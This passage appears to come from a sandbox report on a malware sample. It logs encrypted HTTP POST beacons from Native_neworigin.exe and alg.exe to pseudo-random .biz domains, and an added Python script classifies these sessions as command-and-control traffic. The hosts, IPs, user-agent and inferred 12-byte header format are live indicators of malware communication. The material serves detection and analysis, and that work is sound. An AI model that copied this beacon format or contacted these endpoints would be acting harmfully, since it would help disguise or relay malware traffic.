Nov 26, 2024 08:15:47.427236080 CET | 778 | OUT | Data Raw: 42 9d 4b 2f 28 00 24 e2 fe 02 00 00 ce 8d 38 7c 52 e9 43 1b d0 83 de 85 5e b9 86 b3 1b 25 51 17 e5 0d 11 7b 46 85 b5 62 31 63 3b f7 34 6b 95 88 ad f3 38 de 36 be c4 71 96 b2 1d 96 4b 1f 71 f3 98 c7 0c 36 78 26 de ae 24 1a 71 1b 7c 4e 5f a8 d7 ec
Data Ascii: BK/($8|RC^%Q{Fb1c;4k86qKq6x&$q|N_r_RFzzADZiYNwQIDV)r|pSciL,F$lLk2)[;]p"H:=D?UXF@@AU
Nov 26, 2024 08:15:48.828164101 CET | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e386ef8cfd61ee2967da7a4b9855aeda|8.46.123.75|1732605348|1732605348|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.10 | 50087 | 47.129.31.212 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:48.548155069 CET | 352 | OUT | POST /dafungtde HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:48.548155069 CET | 834 | OUT | Data Raw: f8 5a 46 3a 66 39 6d b9 36 03 00 00 e3 dc 83 a8 52 c0 fa 0e c5 3f 35 02 86 5f b8 4c 4e 38 f6 9c f7 c9 21 83 55 8e 59 11 23 d7 f7 e1 cd 4d 99 9a 2a 3a 8b 6b b6 ac 37 2f d3 0c fe bf d4 e4 81 8d 03 da 35 06 fa 4d 1d 73 4a e0 66 65 16 f8 d1 e9 cc 3f
Data Ascii: ZF:f9m6R?5_LN8!UY#M*:k7/5MsJfe?aPM?LmL>5vC}{!aeUQGwatRQOkH}sBa),]iUEv&^xy](4ai>=*Xx@pw:v2:cp
Nov 26, 2024 08:15:50.606370926 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=88dae33b6ceb032154dbdb251c9a4d10|8.46.123.75|1732605350|1732605350|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.10 | 50088 | 47.129.31.212 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:49.526561975 CET | 343 | OUT | POST /c HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:49.526582003 CET | 778 | OUT | Data Raw: 40 a3 37 72 4c d0 fd 7a fe 02 00 00 2a ee 7c 78 10 d9 38 53 77 87 8b c4 41 51 d3 b8 ac 7f 13 0c 99 11 bb cd 2c fb 90 ba 85 cb 7b 29 b2 65 16 2a f1 3d 64 fc 65 cd 4d a3 6f 5c bc d4 28 bf c6 9f 06 86 a1 66 6e a1 9b 52 46 73 08 e9 a4 f6 9d 82 c0 08
Data Ascii: @7rLz*|x8SwAQ,{)e*=deMo\(fnRFs?l1,\SFXdu*Qm,y5We3ojw "]+YnBQea d*Y</X`3p0BpSmGq["TvG+5M:C
Nov 26, 2024 08:15:51.540936947 CET | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=07df7664a301391ad103de4b6657bc91|8.46.123.75|1732605351|1732605351|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.10 | 50090 | 34.211.97.45 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:50.885222912 CET | 356 | OUT | POST /tgphsmbcvwmuwmj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:50.885222912 CET | 834 | OUT | Data Raw: 5e b7 84 84 79 29 1c 2b 36 03 00 00 a8 ad e0 c2 ed 85 37 be 43 81 e2 f3 65 f2 13 17 56 52 aa cb c3 14 10 de 57 2d 02 92 f0 73 09 c8 4d ed 48 5c 11 12 42 67 b3 97 2d 65 d7 5d 7c 05 78 4b 9c 7f 12 3b 94 cd f0 bd af a9 90 ea c3 6e a3 39 eb 4b a5 a2
Data Ascii: ^y)+67CeVRW-sMH\Bg-e]|xK;n9K7LS8l1yG*Ph-}dOt6nYztj=rhhrw|,hAGu#myf1BW,JLZN<hysH)6JwZ=bm_
Nov 26, 2024 08:15:52.335520029 CET | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7f1400c3965a41fabaded606d962fb4f|8.46.123.75|1732605352|1732605352|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.10 | 50091 | 18.208.156.248 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:52.246824980 CET | 356 | OUT | POST /nnsajrfcymu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:52.246824980 CET | 778 | OUT | Data Raw: 3a df 9f 07 cc b5 c0 f8 fe 02 00 00 f2 6e 93 ec b0 50 8f 9a fc 41 1b 09 16 41 0c 2a 90 b8 2d 3f bc 2f e1 c1 56 5e 00 2b b7 9b b9 57 86 54 bc fa 59 8f e0 5f e5 46 35 2c 53 78 5b 21 f0 52 5e ba 15 b9 ab 46 ec 2b 39 04 d0 57 14 f8 d1 bc 02 ac b0 58
Data Ascii: :nPAA*-?/V^+WTY_F5,Sx[!R^F+9WXK*HJHB3WKNU%+S/Iffp0u=Y;k^Ifo`}B;f_8A9H&"@G\`|'FH^V~Nb3NCQL!:}.3w.Nr[
Nov 26, 2024 08:15:53.403686047 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=aed624f5e173802bc953e3f600562a3d|8.46.123.75|1732605353|1732605353|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.10 | 50093 | 47.129.31.212 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:52.616458893 CET | 353 | OUT | POST /dqxhnesyyna HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:52.616458893 CET | 834 | OUT | Data Raw: 6e 94 92 f9 8c b1 1b 03 36 03 00 00 8b ee 94 d7 3e c5 24 5c e5 15 8e a0 72 b4 29 51 e9 d9 17 2d e6 e3 d7 29 4e 49 a3 d6 7c 1e 26 33 99 66 9b bb 83 ef e9 5d 9d aa 96 fe 0a 6a 61 2c eb 0f 1e d7 d8 54 7b 8b 43 9e 72 f0 25 fc 0f 39 c4 fb fb 8c b1 62
Data Ascii: n6>$\r)Q-)NI|&3f]ja,T{Cr%9b,P?1!iPWPBKpCGPc}kY`[eN_g8~M7!HIJf3t\`5!__1 `QU8D6EaTqgGCBf=
Nov 26, 2024 08:15:54.719578028 CET | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ac84f816099316ed38fd8a1e09c0e0f5|8.46.123.75|1732605354|1732605354|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID: 109 | Source: 192.168.2.10:50094 | Destination: 13.251.16.150:80 | PID: 6072 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:54.533704042 CET | 343 | OUT | POST /b HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:54.533704042 CET | 778 | OUT | Data Raw: d0 0c 45 be 12 4c ad 54 fe 02 00 00 ae 34 7a 94 07 a3 e2 a9 31 41 9e 74 d0 d5 df 77 8c 84 b8 ec ea 4b 41 50 a2 9c b3 bb 0e 69 7d 23 37 ef 45 a4 f6 8f 5c 3a 57 27 bf 8f 1f 40 dc 3f 52 d1 58 c3 57 db 01 ab d8 0d 52 6e 86 d9 eb ce 36 c1 c7 06 a8 04
Data Ascii: ELT4z1AtwKAPi}#7E\:W'@?RXWRn6?`,o%F?:{@9vINyg'{$zaez2[2l`eRV%br2B)Z[A6Lno&OA<ce*Ts%d.@
Nov 26, 2024 08:15:56.591789961 CET | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e6c42f4f226f90362d49b9e6270e10ad|8.46.123.75|1732605356|1732605356|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 110 | Source: 192.168.2.10:50095 | Destination: 18.208.156.248:80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:54.989727020 CET | 355 | OUT | POST /ghhknbcvfb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:54.989727020 CET | 834 | OUT | Data Raw: 09 8a 4b 2e 3f 4e 12 e0 36 03 00 00 ca 25 7f 2b 1e f0 72 19 18 f7 52 6b 67 e3 48 b6 16 dc a1 a4 ef 42 2f 5d 09 10 48 cc e6 ad ca 81 af 0b 0e 5f 52 6f 58 66 60 3a a6 00 a2 c5 e2 37 75 63 14 02 5e 92 16 e9 7e f5 5d 4c 2d f4 9f c9 65 98 f1 e0 e5 66
Data Ascii: K.?N6%+rRkgHB/]H_RoXf`:7uc^~]L-ef8 ]f{9 g}o]mt:t}6P&+25=[<[J/"=P94.2\`#1N-5SK|r[6/dSlb{gBH0*(Y4kjnx R/}kax#
Nov 26, 2024 08:15:56.141606092 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f66ad5e354b13d18a6c7cc48ab1b4dfe|8.46.123.75|1732605355|1732605355|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 111 | Source: 192.168.2.10:50097 | Destination: 13.251.16.150:80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:56.551647902 CET | 345 | OUT | POST /met HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:56.551750898 CET | 834 | OUT | Data Raw: 32 51 91 68 cd ce 69 2e 36 03 00 00 9f 37 91 ba 5a 73 1d 23 91 a1 8c 95 a4 3c 0f 11 8d ea d9 5e 2a 46 f3 19 ab f4 ac d1 a8 91 5f ba 9c bc e8 82 83 2b 3e b7 77 2b 5d 06 03 fe 33 f6 dc 64 92 ff cf 27 2e f9 56 95 a1 3d d3 19 bb e5 2a a9 39 80 ac 35
Data Ascii: 2Qhi.67Zs#<^*F_+>w+]3d'.V=*95~EASY;dyb*:5"w<gw*%/|W'? yos$$vapf&Pt*H[JF8ayHx/?lpva-`To4fX$N x:,>RLA
Nov 26, 2024 08:15:58.699558973 CET | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7bfb1d7709341a3cf2cba78c7f6e6ec5|8.46.123.75|1732605358|1732605358|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


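The POST bodies in sessions 109 to 112 share a structure that the raw dumps make visible: after 8 bytes that differ per request, bytes 8 to 11 hold a little-endian 32-bit value equal to Content-Length minus 12 (0x336 = 822 = 834 - 12 for the Native_neworigin.exe sessions, 0x2fe = 766 = 778 - 12 for the alg.exe sessions). The script below is an added check, not part of the Joe Sandbox report or of the sample's own code; it re-derives that relationship from the printed prefixes and combines it with the other per-session traits (fixed User-Agent, single pseudo-random label under .biz, short path, 200 OK carrying only the chunked terminator plus the btst/snkz cookie pair) into one verdict per session. The 12-byte header layout is an inference from the dump, not a documented protocol format, and the control record BENIGN is constructed.

```python
"""Beacon-pattern check over the HTTP sessions transcribed from the report."""
import re
import struct
from dataclasses import dataclass

# User-Agent copied verbatim from the sessions in the report
BEACON_UA = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
    "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400"
)
HEADER_LEN = 12              # assumed layout: 8 opaque bytes + u32 LE length of the rest
LEN_OFFSET = 8
CHUNKED_EMPTY = b"0\r\n\r\n"  # the server's entire body ("Data Raw: 30 0d 0a 0d 0a")


@dataclass
class Session:
    sid: int
    process: str
    host: str
    path: str
    user_agent: str
    content_length: int
    body_prefix: bytes      # leading bytes of the POST body, as printed in the report
    resp_status: int
    resp_cookies: tuple     # cookie names the server set
    resp_body: bytes


def hexdump_to_bytes(text: str) -> bytes:
    """Convert a 'Data Raw: 6e 94 92 ...' line from the report into bytes."""
    return bytes.fromhex(text.split("Data Raw:", 1)[-1].strip())


def declared_length(body_prefix: bytes):
    """u32 LE at offset 8 of the body, or None if fewer than 12 bytes are known."""
    if len(body_prefix) < HEADER_LEN:
        return None
    return struct.unpack_from("<I", body_prefix, LEN_OFFSET)[0]


def length_field_matches(sess: Session) -> bool:
    """True when the embedded length equals Content-Length minus the 12-byte header."""
    return declared_length(sess.body_prefix) == sess.content_length - HEADER_LEN


def dga_like_host(host: str) -> bool:
    """One pseudo-random lowercase label directly under .biz (jdhhbs.biz, mgmsclkyu.biz)."""
    return re.fullmatch(r"[a-z]{5,10}\.biz", host) is not None


def empty_200_with_cookie_pair(sess: Session) -> bool:
    """200 OK whose body is only the chunked terminator, setting both btst and snkz."""
    return (sess.resp_status == 200
            and sess.resp_body == CHUNKED_EMPTY
            and {"btst", "snkz"} <= set(sess.resp_cookies))


def assess(sess: Session) -> dict:
    """Per-session traits; verdict requires the length relation plus two weaker traits."""
    traits = {
        "fixed_ua": sess.user_agent == BEACON_UA,
        "dga_host": dga_like_host(sess.host),
        "short_path": re.fullmatch(r"/[a-z]{1,12}", sess.path) is not None,
        "length_header": length_field_matches(sess),
        "empty_200_with_cookies": empty_200_with_cookie_pair(sess),
    }
    weak = sum(v for k, v in traits.items() if k != "length_header")
    return {"sid": sess.sid, "traits": traits, "beacon": traits["length_header"] and weak >= 2}


# Values transcribed from sessions 109-112 of this report (first 16 body bytes only)
SESSIONS = [
    Session(109, r"C:\Windows\System32\alg.exe", "jdhhbs.biz", "/b", BEACON_UA, 778,
            hexdump_to_bytes("Data Raw: d0 0c 45 be 12 4c ad 54 fe 02 00 00 ae 34 7a 94"),
            200, ("btst", "snkz"), CHUNKED_EMPTY),
    Session(110, r"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe", "opowhhece.biz",
            "/ghhknbcvfb", BEACON_UA, 834,
            hexdump_to_bytes("Data Raw: 09 8a 4b 2e 3f 4e 12 e0 36 03 00 00 ca 25 7f 2b"),
            200, ("btst", "snkz"), CHUNKED_EMPTY),
    Session(111, r"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe", "jdhhbs.biz",
            "/met", BEACON_UA, 834,
            hexdump_to_bytes("Data Raw: 32 51 91 68 cd ce 69 2e 36 03 00 00 9f 37 91 ba"),
            200, ("btst", "snkz"), CHUNKED_EMPTY),
    Session(112, r"C:\Windows\System32\alg.exe", "mgmsclkyu.biz", "/t", BEACON_UA, 778,
            hexdump_to_bytes("Data Raw: 60 a3 a5 33 f9 c6 b5 d3 fe 02 00 00 76 31 90 bb"),
            200, ("btst", "snkz"), CHUNKED_EMPTY),
]

# Constructed control case (not from the report): an ordinary JSON POST
BENIGN = Session(999, r"C:\Program Files\App\app.exe", "api.example.com", "/v1/telemetry",
                 "App/1.0", 64, b'{"event":"start","ok":true}', 200, ("session",),
                 b'{"status":"ok"}')


if __name__ == "__main__":
    for s in SESSIONS + [BENIGN]:
        r = assess(s)
        print(s.sid, s.host, s.path, "beacon" if r["beacon"] else "benign", r["traits"])
```

Two caveats when reading the result. The length relation holds across both sending processes (alg.exe always sends 778 bytes, Native_neworigin.exe always 834), so it is the strongest of the five traits and is weighted accordingly. The replies, on the other hand, say nothing about whether a live C2 was reached: four different domains behind an nginx front end all answer with the same empty chunked 200 and the same btst/snkz cookie pair, which is how sinkholed domains commonly respond, so do not read the 200 OK as a successful check-in.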
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.10 | 50098 | 34.246.200.160 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:57.305007935 CET | 346 | OUT | POST /t HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: mgmsclkyu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:15:57.305007935 CET | 778 | OUT | Data Raw: 60 a3 a5 33 f9 c6 b5 d3 fe 02 00 00 76 31 90 bb 0a 51 36 04 3c a7 25 6c 6b cc da 6c 2d 82 e5 71 55 0a 4e 07 36 8b e6 c7 01 5a 9c 9b 20 db 51 cc e9 3b b3 12 d5 2f c4 ea f1 3e ce e2 4f 7f af 1f 4f 9b 91 68 c4 65 c4 75 ce e2 c7 a3 a7 1a fa b0 0b 40
    Data Ascii: `3v1Q6<%lkl-qUN6Z Q;/>OOheu@{^q?8T|_2fW;UULw<>u'0b"M,;iej7W:k=9p{&croZx|3W9_?iBi% s@
Nov 26, 2024 08:15:58.776907921 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:15:58 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=a73ee14f1aa792a1f58901419fdd76ad|8.46.123.75|1732605358|1732605358|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.10 | 50099 | 34.246.200.160 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:58.972647905 CET | 358 | OUT | POST /qtbrykoecwonf HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: mgmsclkyu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:15:58.972702026 CET | 834 | OUT | Data Raw: 6c 06 87 80 d2 1a c0 c3 36 03 00 00 e8 70 0b 2a 36 b1 4a e3 c1 4b 91 19 9f a8 04 c8 40 ef a4 73 46 cb 4a 27 48 74 08 5c d0 4a 7a 02 c7 a7 ca 86 b4 25 a9 1a 80 f2 a8 f7 ab 6a 15 ad 01 3a 17 ce d5 ad 78 3a a8 e7 c6 06 ae 47 c6 5b 55 50 9f 24 c2 8d
    Data Ascii: l6p*6JK@sFJ'Ht\Jz%j:x:G[UP$szv"Q+yYDF`CbH3I>`&e|&M*[TU$~m;h^6Ct%e)(eKtZ9u6JEZh3lzn./1{sCkb
Nov 26, 2024 08:16:00.398453951 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:16:00 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=4d64c6157d42c4191adb2abb7edd6add|8.46.123.75|1732605360|1732605360|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.10 | 50100 | 18.141.10.107 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:59.490206003 CET | 356 | OUT | POST /apsbtqhunyqqv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: warkcdu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:15:59.490281105 CET | 778 | OUT | Data Raw: 61 8d 56 40 20 5a 09 14 fe 02 00 00 d5 5c e1 2c a6 18 a0 f2 85 f2 74 4b 2f a9 0d 0b 87 99 81 67 fc 8f d7 d7 f0 c9 2b ae 0a c8 78 e0 ef be cc bf e3 27 c2 c5 a9 00 1d 66 59 fe c3 0c 6e c0 0b 82 d0 8e 31 37 0d fb ef 53 fe 41 72 74 b8 cd 85 13 8a 9f
    Data Ascii: aV@ Z\,tK/g+x'fYn17SArtEocnn21-XwgN`(=?-cZ#?/B&p>8I/VDV4mZ|h$"\BSMJ_dP9d}}m-h46Y5fMohBv@
Nov 26, 2024 08:16:01.563333035 CET | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:16:01 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=2df3b391c9483b2b22389ed20c9ad092|8.46.123.75|1732605361|1732605361|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.10 | 50101 | 18.141.10.107 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:16:00.671976089 CET | 345 | OUT | POST /kc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: warkcdu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:16:00.672017097 CET | 834 | OUT | Data Raw: c7 ca db 48 4e c9 66 57 36 03 00 00 b3 24 63 c0 13 57 a9 1d 57 7b 2a c2 64 68 10 c9 07 27 58 1f ad a0 8f a0 da e8 4e b2 0c 61 8e b4 33 13 1f e7 47 4c 73 52 0f 8c c5 fc cd 4f 94 7c 14 06 15 bf 1e cf 59 65 36 b5 a1 f4 83 11 36 58 4a f5 5e fc 71 f6
